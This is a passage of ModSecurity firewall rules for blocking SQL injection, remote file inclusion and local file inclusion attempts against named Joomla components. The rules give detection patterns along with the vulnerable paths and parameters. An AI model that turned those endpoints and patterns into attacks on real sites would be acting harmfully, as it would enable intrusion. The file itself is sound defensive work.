"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011023,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011024) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011024,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011025,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011026,rev:11,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_jcalpro/cal_popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011017,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/joomlajcalpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011067) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011067,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_wgpicasa&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011077) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011077,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011078) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011078,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011079) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011079,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011080,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011081) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011081,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011131) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /administrator/components/com_jwmmxtd/admin.jwmmxtd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011131,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011132) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion SecRule REQUEST_LINE "@contains /administrator/components/com_universal/includes/config/config.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011132,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,38949'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009383,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[mosConfig_absolute_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009384,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[mosConfig_absolute_path] "(?i:GLOBALS\[mosConfig_absolute_path\]=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /com_ongumatimesheet20/lib/onguma.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009391,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6976/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011557) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011557,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011558) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011558,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011559,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011560) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011560,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011561) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011561,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011554,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jphone" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011385) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011385,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_noticeboard" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011451,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jgrid" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_rwcards/rwcards.advancedate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011844,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011847) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /real_estate/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011847,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jomestate" "chain" SecRule ARGS:task "(?i:task=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011935) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011935,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\x3a\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_banners/banners.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011929,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\x3a\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012014,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jimtawl" "chain" SecRule ARGS:task "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" 